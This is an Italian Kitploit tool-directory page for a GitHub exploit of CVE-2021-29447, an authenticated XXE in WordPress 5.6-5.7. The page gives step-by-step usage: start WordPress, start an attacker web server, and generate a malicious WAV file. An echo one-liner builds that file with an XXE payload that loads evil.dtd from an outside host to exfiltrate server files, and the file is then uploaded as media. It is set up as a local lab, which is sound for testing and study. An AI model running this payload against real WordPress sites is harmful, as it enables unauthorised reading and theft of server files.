Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-29447 — WordPress - XXE autenticato (CVE-2021-29447) | Kitploit
Strumenti/GitHubGitHub/motikan2010/cve-2021-29447
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubmotikan2010/cve-2021-29447

CVE-2021-29447

WordPress - XXE autenticato (CVE-2021-29447)

Vedi Repository
43114 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

WordPress 5.6-5.7 - XXE autenticato (Autore+) (CVE-2021-29447)

Utilizzo

Passaggio 1. Esegui WordPress

root@kitploit:~
$ make up-wp

Passaggio 2. Avvia il server web dell'attaccante

root@kitploit:~
$ make up-mal

Passaggio 3. Genera un file WAV dannoso

Senza wavefile npm (Consigliato)

root@kitploit:~
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav
Scarica lo strumento

Con wavefile npm

root@kitploit:~
$ make make-wav

Passaggio 4. Accedi a WordPress e carica il file WAV in Nuovi media

Passaggio 5. Decodifica

Riferimenti

  • WordPress 5.6-5.7 - XXE autenticato nella libreria multimediale che interessa PHP 8 - Vulnerabilità di sicurezza